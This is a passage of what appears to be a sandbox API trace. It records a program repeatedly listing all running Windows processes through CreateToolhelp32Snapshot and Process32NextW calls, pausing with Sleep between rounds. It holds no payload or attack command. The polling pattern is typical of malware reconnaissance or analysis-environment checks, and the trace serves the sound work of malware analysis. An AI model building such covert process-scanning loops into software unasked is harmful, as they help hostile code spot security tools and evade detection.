dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0104.765] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.768] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0104.769] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0104.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0104.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0104.772] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0104.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0104.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0104.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0104.777] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0104.779] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0104.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0104.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0104.826] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0104.827] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0104.828] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0104.829] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0104.830] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0104.831] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0104.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0104.834] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0104.835] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.837] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0104.838] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0104.839] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0104.840] CloseHandle (hObject=0xbc) returned 1 [0104.840] Sleep (dwMilliseconds=0x12c) [0105.140] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0105.145] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0105.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.147] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.147] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.148] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.149] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.149] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.150] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.151] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.152] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.152] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.153] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.154] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.154] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.155] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.156] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.157] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.158] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.160] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.161] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0105.162] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.164] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.165] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.167] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.168] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0105.169] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0105.170] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0105.171] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0105.173] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0105.174] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0105.175] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0105.176] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0105.178] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0105.216] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0105.217] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0105.218] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0105.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0105.220] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0105.221] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0105.222] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0105.223] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0105.224] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0105.225] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0105.226] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0105.227] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.228] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0105.229] CloseHandle (hObject=0xc4) returned 1 [0105.229] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0105.235] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.235] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0105.236] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.238] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.239] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.240] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 